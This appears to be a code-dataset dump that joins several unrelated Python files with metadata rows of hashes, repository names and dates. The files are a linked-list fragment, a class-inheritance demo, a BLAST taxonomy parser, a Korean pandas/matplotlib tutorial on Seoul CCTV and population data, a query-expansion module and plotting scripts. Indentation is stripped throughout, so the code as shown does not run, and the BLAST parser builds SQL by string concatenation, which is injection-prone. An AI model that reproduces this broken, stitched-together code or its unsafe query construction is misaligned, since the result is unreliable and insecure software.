while node != None:
if node.data == data:
break
node = node.link
return node
def insert(self,position,data):
node = self.getNode(position-1)
if node == None:
self.head = mine_node.Node(data,self.head)
else:
insert_node = mine_node.Node(data,node.link)
node.link = insert_node
def delete(self,position):
node = self.getNode(position-1)
if node != None:
if self.head != None:
self.head = self.head.link
elif node.link != None:
node.link = node.link.link | [
"59605197+sungguenja@users.noreply.github.com"
] | 59605197+sungguenja@users.noreply.github.com |
4724d5aa9415a81ce783f5bab5bea5842e84c4e9 | 217440fcc3a91e4ad1a8e008bd315128de7d571a | /day11/08-常见类的函数.py | 9a1178d3e15539060839c925447403eea8ccf73c | [] | no_license | zhangbo111/0102-0917 | a6af056ce9c9a8ab9500e8d016846dc6c50ec1c6 | 1631ea402612e82ae62b093749e2c4f19a021c63 | refs/heads/master | 2020-04-18T16:55:41.675156 | 2019-02-12T01:48:25 | 2019-02-12T01:48:25 | 167,643,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | class Father:
pass
class Mother:
pass
class Laowang:
pass
class Son(Father, Mother):
pass
# 检测一个类是否是另外一个类的子类 如果是返回True 否 False
result1 = issubclass(Son, Father)
result2 = issubclass(Son, Mother)
result3 = issubclass(Son, Laowang)
# 检测Son类是否是Mother类或者Laowang类的子类 满足一个就可以
result4 = issubclass(Son, (Mother, Laowang))
print(result1, result2, result3, result4)
| [
"13349949963@163.com"
] | 13349949963@163.com |
25d996f06fce63fdbea1b90a502572653b8d3692 | fb1ede53fd30ad5350bfd705c6f64f455f8a61e3 | /blast_relatedness_parse.py | c953952a9b7771674f5f1145879293116b877e35 | [] | no_license | sunray1/working_scripts | a8110db5ebafd95606d52b3c8f8406321007b892 | a603ff6d94756d3516d236b4539f67b31d9e84c7 | refs/heads/master | 2022-09-14T08:48:49.751370 | 2022-09-13T02:32:30 | 2022-09-13T02:32:30 | 130,236,320 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,948 | py | #!/usr/bin/python
#script takes self blast output and uses the GI numbers to look up
#in the sql blast database and make sure they're in the same family
# ./script.py blastsql taxodatabase blastout
import os, sys, sqlite3
conn = sqlite3.connect(sys.argv[1])
c = conn.cursor()
c.execute("ATTACH '" + sys.argv[2] + "' as 'db'")
hit_dic = {}
count = 0
#make a dictionary with target and query GIs from self blast
with open(sys.argv[3]) as o:
line = o.readline()
while line:
hit_dic[line.split("|")[1]] = line.split("|")[5]
line = o.readline()
#get the family for each match
#gets genus from blastsql, then uses while loop to loop up to family in taxodatabase
with open(sys.argv[3].split(".")[0] + '_errors.txt', 'w') as o:
for i in hit_dic:
count += 1
count2 = 0
count3 = 0
query_rank = ''
target_rank = ''
for iter in c.execute("SELECT Species FROM blast WHERE GI='" + i + "'"):
query_taxa = iter[0]
#have to keep counts in case something is wrong with sql and it never find the family
while query_rank != 'Family' and count2 < 10:
for iter in c.execute("SELECT n2.namestr, r2.namestr FROM names n1, names_to_taxonconcepts ntt1, taxon_concepts tc1, taxon_concepts tc2, names_to_taxonconcepts ntt2, names n2, ranks r2 WHERE n1.name_id=ntt1.name_id AND ntt1.tc_id=tc1.tc_id AND tc1.parent_id=tc2.tc_id AND ntt2.tc_id=tc2.tc_id AND n2.name_id=ntt2.name_id AND tc2.rank_id = r2.rank_id AND n1.namestr='"+query_taxa+"' GROUP BY n2.namestr, r2.namestr"):
query_taxa = str(iter[0])
query_rank = str(iter[1])
count2 += 1
if count2 == 10:
o.write('ERROR WITH ' + str(i) + '/' + str(hit_dic[i])+'\n')
for iter in c.execute("SELECT Species FROM blast WHERE GI='" + hit_dic[i] + "'"):
target_taxa = iter[0]
while target_rank != 'Family' and count3 < 10:
for iter in c.execute("SELECT n2.namestr, r2.namestr FROM names n1, names_to_taxonconcepts ntt1, taxon_concepts tc1, taxon_concepts tc2, names_to_taxonconcepts ntt2, names n2, ranks r2 WHERE n1.name_id=ntt1.name_id AND ntt1.tc_id=tc1.tc_id AND tc1.parent_id=tc2.tc_id AND ntt2.tc_id=tc2.tc_id AND n2.name_id=ntt2.name_id AND tc2.rank_id = r2.rank_id AND n1.namestr='"+target_taxa+"' GROUP BY n2.namestr, r2.namestr"):
target_taxa = str(iter[0])
target_rank = str(iter[1])
count3 += 1
if count3 == 10:
o.write('ERROR WITH ' + str(hit_dic[i]) + '/' + str(i)+'\n')
print(round((float(count)/float(len(hit_dic.keys())))*100, 2))
#if the families are not the same between the query and the hit, print
if query_taxa != target_taxa and count2 != 10 and count3 != 10:
o.write(i+' '+query_taxa+' '+hit_dic[i]+' '+target_taxa+'\n')
conn.close() | [
"sunray1@bellsouth.net"
] | sunray1@bellsouth.net |
54a251f30b2601ed672edae210098571b0c30163 | e0542daed886c1b9ba6e92759be4b878ef116ff1 | /1장_공부.py | c17e388d008f38e88f90e2c4d89ff63a68723012 | [] | no_license | lemontree0626/python_study | fb25b39c7be3848ee8903fd4214c0cfbf6c04a81 | 30b2a1373b6f2681f5f7a7e4cae5f5c290ff7948 | refs/heads/master | 2020-08-07T02:53:05.314596 | 2019-10-14T08:18:52 | 2019-10-14T08:18:52 | 213,269,787 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,602 | py |
# coding: utf-8
# # 1.1 CCTV 현황과 인구 현황 데이터 구하기
# * 서울시 자치구 연도별 CCTV 설치 현황 사이트
# * 서울시 서울통계 사이트
# # 1.2 파이썬에서 텍스트 파일과 엑셀 파일 읽기 -pandas
# In[40]:
# 모듈 불러오기
import pandas as pd
# In[41]:
# csv 파일 불러오기
CCTV_Seoul = pd.read_csv("../data/01. CCTV_in_Seoul.csv", encoding = "utf-8")
CCTV_Seoul.head()
# In[42]:
#CCTV_Seoul 데이터 끝 부분 확인
CCTV_Seoul.tail()
# In[43]:
#column(열) 확인
CCTV_Seoul.columns
# In[44]:
#column를 인덱스로 확인 가능
CCTV_Seoul.columns[0] #0:기관명, 1:소계, 2:2013년도 이전, 3:2014년, 4:2015년, 5:2016년
# In[45]:
#column의 이름 변경(rename)
CCTV_Seoul.rename(columns={CCTV_Seoul.columns[0]: "구별"}, inplace=True)#inplace=True:변수의 내용을 갱신해라
#{CCTV_Seoul.columns[0]:기관명 -> rename:구별
CCTV_Seoul.head()
# In[46]:
#excel 파일 불러오기
pop_Seoul = pd.read_excel("../data/01. population_in_Seoul.xls",encoding="utf-8")
pop_Seoul.head()
# In[47]:
#excel 파일 불러오기(옵션 적용)
pop_Seoul = pd.read_excel("../data/01. population_in_Seoul.xls",
header = 2, #세번째 줄부터 읽어라(파이썬은 0부터 시작한다)
usecols = "B, D, G, J, N", #엑셀의 B열, D열, G열, J열, N열만 골라서 불러와라(parse_cols->usecols)
encoding="utf-8")
pop_Seoul.head()
# In[48]:
#rename으로 이름 변경
pop_Seoul.rename(columns={pop_Seoul.columns[0] : "구별",
pop_Seoul.columns[1] : "인구수",
pop_Seoul.columns[2] : "한국인",
pop_Seoul.columns[3] : "외국인",
pop_Seoul.columns[4] : "고령자"}, inplace=True)
pop_Seoul.head()
# # 1-3 pandas 기초 익히기
# In[49]:
#모듈 불러오기
import pandas as pd
import numpy as np
# In[50]:
#pandas Series 사용(list 데이터)
s = pd.Series([1,3,5,np.nan,6,8]) #Series:list 데이터로 만든다
s
# In[51]:
#pandas data_range 사용(기본 날짜 설정)
dates = pd.date_range("20130101", periods=6)#periods=6 :2013년 01월 01일 부터 6일을 뽑아라
dates
# In[52]:
#데이터 프레임 생성
df = pd.DataFrame(np.random.randn(6,4), index=dates, columns=["A", "B", "C", "D"])
#np.random.randn(randn:가우시안 표준 정규 분포)
df
# In[53]:
#데이터프레임의 인덱스 보기
df.index
# In[54]:
#데이터 프레임의 columns 보기
df.columns
# In[55]:
#데이터 프레임의 내용물 보기(values)
df.values
# In[56]:
#데이터 프레임의 개요 보기(info())
df.info()
# In[57]:
#데이터 프레임의 통계적 개요 보기(describe())
df.describe() #values(내용물)이 숫자가 아니라 문자라도 그에 맞게 개요가 나타난다
# In[58]:
#sort_values(by=기준) 사용하기
df.sort_values(by="B", ascending=False)
# In[59]:
#데이터 프레임의 column으로 보기
df["A"]
# In[60]:
#데이터 프레임의 인덱스 0~3개 보기
df[0:3]
# In[61]:
#데이터 프레임의 특정 인덱스만 보기
df["20130102":"20130104"] # or df[1:3]
# In[62]:
#loc(location) 슬라이싱 사용(iloc와 차이점 알아두기!)
df.loc[dates[0]] #2013-01-01 -2.014368 0.540903 -1.209860 0.684123(index=dates, 가로로 추출)
# In[63]:
#loc로 a,b 행만 보기
df.loc[:,["A","B"]]#:=인덱스 모두
# In[64]:
#loc로 행과열 지정해서 보기
df.loc["20130102":"20130104",["A","B"]]
# In[65]:
#loc로 행과열 지정해서 보기2
df.loc["20130102",["A","B"]] # or df.loc[dates[1],["A","B"]]
# In[66]:
#iloc:loc 명령어와 달리 행과 열의 번호를 이용
df.iloc[3] #index[3],dates[3]의 뜻
# In[67]:
#iloc의 중요점!:왼쪽이 행,오른쪽이 열을 뜻한다(loc도 마찬가지, 다만 iloc는 번호를 이용한다!)
df.iloc[3:5,0:2]
# In[68]:
#iloc로 특정행과 열들을 골라서 보기
df.iloc[[1,2,4],[0,2]]
# In[69]:
#iloc로 전체범위 설정해서 보기
df.iloc[1:3,:]
# In[70]:
df.iloc[:,1:3]
# In[71]:
df
# In[72]:
#데이터프레임으로 조건으로 보기(True,False 형식)
df > 0 #True,False 형식으로 나옴
# In[73]:
#데이터프레임으로 조건으로 보기(리스트 형식)
df[df > 0]
# In[74]:
#데이터 프레임 복사하기(copy
df2 = df.copy()
# In[75]:
#데이터 프레임의 칼럼 추가하기
df2["E"] = ["one", "one", "two", "three", "four", "three"]
df2
# In[76]:
#데이터프레임의 특정 컬럼에 조건 걸기(isin)
df2["E"].isin(["four","three"])
# In[77]:
#데이터프레임의 특정 컬럼에 조건 걸기(isin) 리스트 형태
df2[df2["E"].isin(["four","three"])]
# In[78]:
#데이터 프레임에 특정 함수 적용(apply)
df.apply(np.cumsum) #누적합 함수
# In[79]:
#one-line 함수의 lambda
df.apply(lambda x: x.max() - x.min())
# # 1-4 pandas 이용해서 CCTV와 인구 현황 데이터 파악하기
# In[80]:
#데이터 확인 하기
CCTV_Seoul.head()
# In[81]:
#소계를 기준으로 내림차순 하기
CCTV_Seoul.sort_values(by="소계", ascending=True).head()
#도봉구,마포구,송파구,중랑구,중구 순으로 적은것을 확인
# In[82]:
#소계를 기준으로 오름차순 하기
CCTV_Seoul.sort_values(by="소계", ascending=False).head()
#강남구,양천구,서초구,은평구,용산구 순으로 많은것을 확인
# In[83]:
#최근증가율 컬럼을 만들고 그속에 최근 3년간 cctv증가율 계산한것을 넣기(2014+2015+2016 / 2013)
CCTV_Seoul["최근증가율"] = (CCTV_Seoul["2016년"] + CCTV_Seoul["2015년"] + CCTV_Seoul["2014년"]) / CCTV_Seoul["2013년도 이전"] * 100
CCTV_Seoul.sort_values(by="최근증가율", ascending=False)
# In[84]:
#서울시 데이터 확인
pop_Seoul.head()
# In[85]:
#필요없는 행 지우기(drop)
pop_Seoul.drop([0], inplace=True)
pop_Seoul
# In[86]:
#unique 칼럼 보기(중복 데이터 거르기)
pop_Seoul["구별"].unique()
#nan값 확인
# In[87]:
#nan값이 어디 있는지 확인하기(isnull)
pop_Seoul[pop_Seoul["구별"].isnull()]
# In[88]:
#nan값 있는 행 삭제하기
pop_Seoul.drop([26], inplace=True)
# In[89]:
pop_Seoul.tail()
# In[90]:
#전체 인구로 외국인 비율과 고령자 비율 계산후 칼럼 만들기
pop_Seoul["외국인비율"] = (pop_Seoul["외국인"] / pop_Seoul["인구수"]) * 100
pop_Seoul["고령자비율"] = (pop_Seoul["고령자"] / pop_Seoul["인구수"]) * 100
pop_Seoul.head()
# In[91]:
#인구수 기준으로 정렬하기
pop_Seoul.sort_values(by="인구수",ascending=False).head()
# In[92]:
#외국인 기준으로 정렬하기
pop_Seoul.sort_values(by="외국인",ascending=False).head()
# In[93]:
#외국인비율 기준으로 정렬하기
pop_Seoul.sort_values(by="외국인비율",ascending=False).head()
# In[94]:
#고령자 기준으로 정렬하기
pop_Seoul.sort_values(by="고령자",ascending=False).head()
# In[95]:
#고령자비율 기준으로 정렬하기
pop_Seoul.sort_values(by="고령자비율",ascending=False).head()
# # 1.5 pandas의 고급기능 두 데이터 병합하기
# In[96]:
#연습용 데이터 프레임 3개 만들기
df1 = pd.DataFrame({"A":["A0","A1","A2","A3"],
"B":["B0","B1","B2","B3"],
"C":["C0","C1","C2","C3"],
"D":["D0","D1","D2","D3"]},index=[0,1,2,3])
df2 = pd.DataFrame({"A":["A4","A5","A6","A7"],
"B":["B4","B5","B6","B7"],
"C":["C4","C5","C6","C7"],
"D":["D4","D5","D6","D7"]},index=[4,5,6,7])
df3 = pd.DataFrame({"A":["A8","A9","A10","A11"],
"B":["B8","B9","B10","B11"],
"C":["C8","C9","C10","C11"],
"D":["D8","D9","D10","D11"]},index=[8,9,10,11])
# In[97]:
#df1 데이터프레임 확인
df1.head()
# In[98]:
#df2 데이터프레임 확인
df2.head()
# In[99]:
#df3 데이터프레임 확인
df3.head()
# In[100]:
#데이터를 열방향으로 합치기(concat)
result = pd.concat([df1, df2, df3])
result
# In[101]:
#concat에 option(keys)
result = pd.concat([df1, df2, df3], keys = ["x", "y", "z"]) #keys = 다중 index으로 설정되어 level을 형성
result
# In[102]:
#result의 인덱스 확인
result.index
# In[103]:
#result index에서 level values(0)을 확인
result.index.get_level_values(0)
# In[104]:
#result index에서 level values(1)을 확인
result.index.get_level_values(1)
# In[105]:
#df4 생성하고 df1과 df4를 axis(1)로 concat하기
df4 = pd.DataFrame({"B":["B2","B3","B6","B7"],
"D":["D2","D3","D6","D7"],
"F":["F2","F3","F6","F7"]},index = [2, 3, 6, 7])
result = pd.concat([df1, df4], axis=1)
# In[106]:
#df1 확인
df1
# In[107]:
#df4 확인
df4
# In[108]:
#axis(1)한 result 확인
result #df4:index = [2, 3, 6, 7]
#concat 명령어는 index 기준으로 합친다는 것을 알수 있다.
#값을 가질수 없는 곳은 null값으로 처리된다 -> null 값 처리 대신 버리게 하는것:join="inner"
# In[109]:
#공통되지 않는 index의 데이터는 버리도록 하는 옵션(join="inner")
result = pd.concat([df1, df4], axis=1, join="inner")
# In[110]:
result
#문제점:null값 있는 곳을 삭제했더니 데이터가 있었던 곳도 전부 삭제되었다.
# In[111]:
#df1의 인덱스에 맞추도록 하자(join_axes=[df1.index])
result = pd.concat([df1, df4], axis=1, join_axes=[df1.index])
result
#문제점:df4의 나머지 인덱스은 합쳐지지 않고 삭제되었다.
# In[112]:
#열을 기준으로 합치는데 index를 무시하고 병합하자(ignore_index=True)
result = pd.concat([df1, df4], ignore_index=True)
result
# In[113]:
#left, right 데이터 두개 만들기
left = pd.DataFrame({"key":["K0", "K4", "K2", "K3"],
"A":["A0","A1","A2","A3"],
"B":["B0","B1","B2","B3"]})
right = pd.DataFrame({"key":["K0", "K1", "K2", "K3"],
"C":["C0","C1","C2","C3"],
"D":["D0","D1","D2","D3"]})
# In[114]:
#left 데이터 확인
left
# In[115]:
#right 데이터 확인
right
# In[116]:
#merge 명령어로 병합하기(on 옵션)
pd.merge(left, right, on = "key")
#key 열 기준으로 공통된것만 합친다(나머지는 삭제)
# In[117]:
#merge 명령어로 병합하기(how 옵션) ->left를 기준으로 설정
pd.merge(left, right, how="left", on = "key")
#left 데이터
#0 K0 A0 B0
#1 K4 A1 B1
#2 K2 A2 B2
#3 K3 A3 B3
#right 데이터
#0 K0 C0 D0
#1 K1 C1 D1
#2 K2 C2 D2
#3 K3 C3 D3
# In[118]:
#merge 명령어로 병합하기(how 옵션) -> right를 기준으로 설정
pd.merge(left, right, how="right", on = "key")
#left 데이터
#0 K0 A0 B0
#1 K4 A1 B1
#2 K2 A2 B2
#3 K3 A3 B3
#right 데이터
#0 K0 C0 D0
#1 K1 C1 D1
#2 K2 C2 D2
#3 K3 C3 D3
# In[119]:
#merge의 합집합(how="outer")
pd.merge(left, right, how="outer", on = "key")
# In[120]:
#merge의 교집합(how="inner")
pd.merge(left, right, how="inner", on = "key")
# # 1-6 CCTV 데이터와 인구 현황 데이터를 합치고 분석하기
# In[121]:
#merge 명령으로 두데이터 합치기
data_result = pd.merge(CCTV_Seoul, pop_Seoul, on="구별")
data_result.head()
# In[122]:
#의미 없는 칼럼 삭제(drop[행],del[열])
del data_result["2013년도 이전"]
del data_result["2014년"]
del data_result["2015년"]
del data_result["2016년"]
data_result.head()
# In[123]:
#칼럼중 하나("구별")를 인덱스로 설정(set_index)
data_result.set_index("구별", inplace=True)
data_result
# ## 상관관계 분석(np.corrcoef)
# * 0.1 이하:무시
# * 0.3 이하:약한 상관관계
# * 0.7 이하:뚜렷한 상관관계
# * 결과는 행렬로 나타난다, 주 대각선을 기준으로 대칭인 행렬이고 대각선을 빼고 다른 값을 읽으면 된다.
# In[124]:
#고령자 비율과 소계의 상관관계 분석
np.corrcoef(data_result["고령자비율"],data_result["소계"])
# In[125]:
#외국인 비율과 소계의 상관관계 분석
np.corrcoef(data_result["외국인비율"],data_result["소계"])
# In[126]:
#인구수와 소계의 상관관계 분석
np.corrcoef(data_result["인구수"],data_result["소계"])
#0.3 이하 이므로 약한 상관관계라는것을 알수 있다.
# In[127]:
#소계를 기준으로 내림차순 하기(sort_values)
data_result.sort_values(by="소계", ascending=False).head()
# # 1-7 파이썬의 대표 시각화 도구-matplotlib
# In[131]:
#모듈 불러오기
import matplotlib.pyplot as plt
get_ipython().magic('matplotlib inline')
import numpy as np
#결과를 바로 보여주기(plt.show()를 안써도 된다)
# In[130]:
#간단한 그래프 생성
plt.figure
plt.plot([1,2,3,4,5,6,7,8,9,8,7,6,5,4,3,2,1,0])
#plt.show()
# In[132]:
#arange와 sin 사용
t = np.arange(0,12,0.01) #0~12까지 0.01 간격으로 생성
y = np.sin(t)
# In[133]:
#sin 함수 그래프 그리기
plt.figure(figsize=(10,6))
plt.plot(t, y)
#plt.show()
# In[138]:
#sin 함수 그래프 그리기(label,grid,title 옵션 적용)
plt.figure(figsize=(10,6))
plt.plot(t, y)
plt.grid()
plt.xlabel("time")
plt.ylabel("Amplitude(진폭)")
plt.title("Example of sinewave")
#plt.show()
# ## 그래프 한글 인코딩 코드
# In[137]:
import platform
from matplotlib import font_manager, rc
path = "c:/Windows/Fonts/malgun.ttf"
if platform.system() == 'Darwin':
rc('font', family='AppleGothic')
elif platform.system() == 'Windows':
font_name = font_manager.FontProperties(fname=path).get_name()
rc('font', family=font_name)
else:
print('Unknown system... sorry~~~~')
plt.rcParams["axes.unicode_minus"] =False
# In[139]:
#plot 두개를 한 화면 생성(legend(범례) 옵션 적용)
plt.figure(figsize=(10,6))
plt.plot(t, np.sin(t), label="sin")
plt.plot(t, np.cos(t), label="cos")
plt.grid()
plt.legend()
plt.xlabel("time")
plt.ylabel("Amplitude")
plt.title("Example of sinewave")
#plt.show()
# In[140]:
#lw(선의 굵기),color(색상 지정)
plt.figure(figsize=(10,6))
plt.plot(t, np.sin(t), lw=3, label="sin")
plt.plot(t, np.cos(t), "r", label="cos") #r:red -> color="red"
plt.grid()
plt.legend()
plt.xlabel("time")
plt.ylabel("Amplitude")
plt.title("Example of sinewave")
#plt.show()
# In[146]:
#임의의 두 데이터 생성후 그래프 그리기
t = [0, 1, 2, 3, 4, 5, 6]
y = [1, 4, 5, 8, 9, 5, 3]
plt.figure(figsize=(10,6))
plt.plot(t, y, color="green")
#plt.show()
# In[147]:
#line style 지정
plt.figure(figsize=(10,6))
plt.plot(t,y, color="green", linestyle="dashed")
#linestyles = ['-', '--', '-.', ':']
#('solid', 'solid') # Same as (0, ()) or '-'
#('dotted', 'dotted') # Same as (0, (1, 1)) or '.'
#('dashed', 'dashed') # Same as '--'
#('dashdot', 'dashdot')
#plt.show()
# In[149]:
#marker 옵션 지정
plt.figure(figsize=(10,6))
plt.plot(t, y, color="green", linestyle="dashed", marker="o")
#marker 표시명령어 = https://matplotlib.org/3.1.1/api/markers_api.html
#plt.show()
# In[155]:
#marker 색상과 크기 지정(markerfacecolor, markersize)
plt.figure(figsize=(10,6))
plt.plot(t, y, color='green', linestyle='dashed', marker='o',
markerfacecolor = 'blue', markersize=12)
plt.xlim([-0.5, 6.5])
plt.ylim([0.5, 9.5])
#plt.show()
# In[156]:
#scatter(흩어지게 하다)로 그래프 그리기
#데이터 생성
t = np.array([0,1,2,3,4,5,6,7,8,9])
y = np.array([9,8,7,9,8,3,2,4,3,4])
#scatter 그래프 그리기
plt.figure(figsize=(10,6))
plt.scatter(t,y)
#plt.show()
# In[157]:
#scatter의 marker 지정
plt.figure(figsize=(10,6))
plt.scatter(t,y, marker=">")
#plt.show()
# In[158]:
#축 값에 따라 색상을 바꾸는 color map 지정
colormap = t
plt.figure(figsize=(10,6))
plt.scatter(t,y, s = 50, c = colormap, marker=">")#s = 50 marker 사이즈
plt.colorbar()
#plt.show()
# In[159]:
#numpy의 랜덤변수 함수로 데이터 세개 생성
s1 = np.random.normal(loc=0, scale=1, size=1000)
s2 = np.random.normal(loc=5, scale=0.5, size=1000)
s3 = np.random.normal(loc=10, scale=2, size=1000)
# In[160]:
#랜덤변수 데이터 그래프 그리기
plt.figure(figsize=(10,6))
plt.plot(s1, label="s1")
plt.plot(s2, label="s2")
plt.plot(s3, label="s3")
plt.legend()
#plt.show()
# In[161]:
#boxplot으로 그래프 그리기
plt.figure(figsize=(10,6))
plt.boxplot((s1, s2, s3))
plt.grid()
#plt.show()
# # 1-8 CCTV 현황 그래프로 분석하기
# In[162]:
#데이터 확인
data_result.head()
# In[163]:
#plot 붙여서 그래프 바로 그리기
data_result["소계"].plot(kind="barh", grid=True, figsize=(10,10)) #barh:수평방향, bar:수직방향
#plt.show()
# In[164]:
#plot 붙여서 정렬하고 수평 그래프 바로 그리기
data_result["소계"].sort_values().plot(kind="barh", grid=True, figsize=(10,10)) #barh:수평방향, bar:수직방향
#plt.show()
# In[165]:
#CCTV 비율 계산해서 칼럼 만들고 그래프 그리기
data_result["CCTV비율"] = data_result["소계"] / data_result["인구수"] * 100
data_result["CCTV비율"].sort_values().plot(kind="barh", grid=True, figsize=(10,10))
#plt.show()
# In[166]:
#scatter로 그래프 그리기
plt.figure(figsize=(6,6))
plt.scatter(data_result["인구수"], data_result["소계"], s=50)
plt.xlabel("인구수")
plt.ylabel("CCTV")
plt.grid()
#plt.show()
# In[167]:
#데이터를 대표하는 직선을 그리기
fp1 = np.polyfit(data_result["인구수"], data_result["소계"], 1) #세번쨰 인자는 찾고자 하는 함수의 차수입니다. 2를 넣어주면 2차식의 계수를 찾아달라
fp1
# In[168]:
#직선을 그리기 위해 x축과 y축 데이터 얻기
f1 = np.poly1d(fp1) #x축
fx = np.linspace(100000, 700000, 100) #y축
#자세한 설명은 https://pinkwink.kr/1127 사이트 참고
# In[169]:
plt.figure(figsize=(10,10))
plt.scatter(data_result["인구수"], data_result["소계"], s=50)
plt.plot(fx, f1(fx), ls="dashed", lw=3, color="g")
plt.xlabel("인구수")
plt.ylabel("CCTV")
plt.grid()
#plt.show()
# In[170]:
#두가지를 추가
#1. 직선이 전체 데이터의 대표값 역할(인구수가 300000 일때 cctv는 1100정도)이면 그 경향에서 멀리 떨어진 구는 이름이 같이 나타나도록 한다.
#2. 직선에서 멀어질수록 다른 색을 나타내도록 한다
#1.오차를 계산할수 있는 코드 생성후 오차가 큰 순으로 데이터를 정렬
#데이터를 대표하는 직선을 그리기
fp1 = np.polyfit(data_result["인구수"], data_result["소계"],1)
#직선을 그리기 위해 x축과 y축 데이터 얻기
f1 = np.poly1d(fp1)
fx = np.linspace(100000, 700000, 100)
#오차 칼럼 만들기
data_result["오차"] = np.abs(data_result["소계"] - f1(data_result["인구수"]))#np.abs:절대값을 구하는 함수
#오차를 기준으로 정렬하고 df_sort 데이터 생성
df_sort = data_result.sort_values(by="소계", ascending=False)
df_sort.head()
# In[171]:
#2. 텍스트와 color map
plt.figure(figsize=(14,10))
plt.scatter(data_result["인구수"],data_result["소계"],
c=data_result["오차"], s=50)
plt.plot(fx, f1(fx), ls="dashed", lw=3, color="g")
for n in range(10):
plt.text(df_sort["인구수"][n]*1.02, df_sort["소계"][n]*0.98,
df_sort.index[n], fontsize=15)
plt.xlabel("인구수")
plt.ylabel("인구당비율")
plt.colorbar()
plt.grid()
#plt.show()
| [
"noreply@github.com"
] | lemontree0626.noreply@github.com |
8b1597e6c4cbae6ebf1369434d965beb7449a14c | f0aba4e96b36c9b06c6af3c058f56693e4be9a3a | /query_expansion.py | 0188ca10dc3bc70203ff58cd6f74b77ba6a396eb | [] | no_license | j00n44th44n/VGM_SRI | c14b510b8b2628e3f9c55ea2f8c7d102051edde5 | 5d9f9b94d48351a93a5d120479f25756bebae048 | refs/heads/master | 2022-02-22T12:19:11.604215 | 2019-10-16T13:58:57 | 2019-10-16T13:58:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,999 | py | from nltk.corpus import stopwords
from string import punctuation
from nltk import wordpunct_tokenize
import json
import modelo
import index
from nltk.corpus import wordnet as wn
from langdetect import detect
def start(json_request):
data = json.loads(json_request)
json_result = json.loads(modelo.request_query(data['query'], data['count'], data['similarity_techniques']))
documents = [pair["document"] for pair in json_result['results']]
relevant_words = pseudo_Relevance_Feedback(documents)
words = data['query'] + " " + relevant_words
if detect(data['query']) == 'en':
words = words + " " + expansion_synonyms(data['query'])
return modelo.request_query(words, data['count'], data['similarity_techniques'])
def pseudo_Relevance_Feedback(documents):
relevant_words = set()
for doc in documents:
json_request = json.dumps({'action': 'terms_frec', 'key': doc})
json_response = json.loads(index.start(json_request))
lista = json_response['terms']
lista.sort(key=lambda x: x[1], reverse=True)
relevant_words.add(lista[0][0])
return " ".join(list(relevant_words))
def expansion_synonyms(data):
spanish_stop = stopwords.words('spanish')
english_stop = stopwords.words('english')
all_stopwords = spanish_stop + english_stop
non_words = list(punctuation)
# we add spanish punctuation
non_words.extend(['¿', '¡'])
non_words.extend(map(str, range(10)))
tokens = wordpunct_tokenize(data)
tokens = [elem for elem in tokens if (elem not in all_stopwords and elem not in non_words)]
words=[]
synonyms = []
for token in tokens:
print(token)
for syn in wn.synsets(token):
# print(syn.lemmas())
for lm in syn.lemmas():
# print(lm/)
synonyms.append(lm.name())
synonyms = (set(synonyms))
words.extend(list(synonyms)[:2])
synonyms = []
return " ".join(words)
| [
"victorernesto23@gmail.com"
] | victorernesto23@gmail.com |
64262c2cfe6686d0dc92b2b645a5bb50c0b2ae6a | d722ebbcd7856e2fd76173b6dffb64acce78c898 | /tests.py | 431e220819a84c8bb5512702a53f390cef4276d4 | [] | no_license | bevesce/convert_currency | cccd9de97673307386aec9e5b60822383df8804b | 6273ca0f9e32df6b0a4b1f3d29e8a46efaa69f56 | refs/heads/master | 2021-06-03T03:09:19.524643 | 2016-09-24T13:29:08 | 2016-09-24T13:29:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 195 | py | import unittest
import convert_currency as c
print(c.convert_currency('1'))
print(c.convert_currency('1 eur'))
print(c.convert_currency('1 eur zł'))
print(c.convert_currency('1 eur zł usd'))
| [
"bevesce@gmail.com"
] | bevesce@gmail.com |
ded443c1b9aa98d41b6473871b774a326b7ffcdb | 042e55c3a527cfe0ca89e8e83363cdd0f3fd3847 | /PlotNetwork/PlotTrends.py | 3c3f8ac175b26e893f76a7db6bc6f63381700d72 | [] | no_license | Joan93/BigData | f1caa30cbbb64adb5b0bb9e7422e081375ef9546 | ed0870e3bdb432fb3e74e456bcb97f9a44c6a651 | refs/heads/master | 2016-09-13T12:07:41.395413 | 2016-06-07T12:03:48 | 2016-06-07T12:03:48 | 56,164,440 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,355 | py | import matplotlib.pyplot as plt
import matplotlib.dates as dte
import networkx as nx
import numpy as np
import time
import fileinput
import os
import re
from datetime import datetime
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(text):
'''
alist.sort(key=natural_keys) sorts in human order
http://nedbatchelder.com/blog/200712/human_sorting.html
(See Toothy's implementation in the comments)
'''
return [atoi(c) for c in re.split('(\d+)', text)]
ListOfTimes =[]
ListOfBicycles=[]
ListOfRealTime=[]
ListOfSlots=[]
# degree_sequence=[1,5,9,10,2,6,7]
# time_sequence=[0,2,3,4,5,6,8]
# plt.plot(time_sequence,degree_sequence)
# # plt.xlabel(time_sequence)
# plt.show()
FolderPath="/home/ns3/Documents/BicingProject/BigData/Process_Data/Station/"
files = [f for f in os.listdir(FolderPath) if f.endswith(".dat")]
files.sort(key=natural_keys)
for file in files:
ListOfTimes = []
ListOfBicycles = []
ListOfRealTime = []
ListOfSlots = []
with open(FolderPath+file,"r") as fid:
for line in fid:
f = line.split(' ')
#print f
for element in f:
g=element.split(';')
#print len(g)
if len(g)>1:
ListOfTimes.append(int(g[1]))
ListOfBicycles.append(int(g[2]))
fid.close()
#print ListOfBicycles
#print ListOfTimes
for element in ListOfTimes:
dia,slot=divmod(element,1000)
minute=slot*3
hora,minuto=divmod(minute,60)
tiempo2=datetime(2012, 5, dia, hora, minuto)
if hora<10:
hora="0"+str(hora)
if minuto<10:
minuto="0"+str(minuto)
if dia<10:
dia="0"+str(dia)
cadena="2012/12/" + str(dia)+ " " + str(hora) + ":" + str(minuto)
#print cadena
#print tiempo2
#print cadena, tiempo2
ListOfRealTime.append(tiempo2)
#print "aaaaaaaa"
#print len(ListOfBicycles),len(ListOfRealTime), len(ListOfTimes)
plt.plot(ListOfRealTime, ListOfBicycles)
plt.gcf().autofmt_xdate()
plt.title(file)
plt.grid()
plt.savefig("/home/ns3/Documents/BicingProject/BigData/PlotNetwork/StationGraphs/BIGBicycle_usage_"+file +".png")
print "File " +file+".png saved"
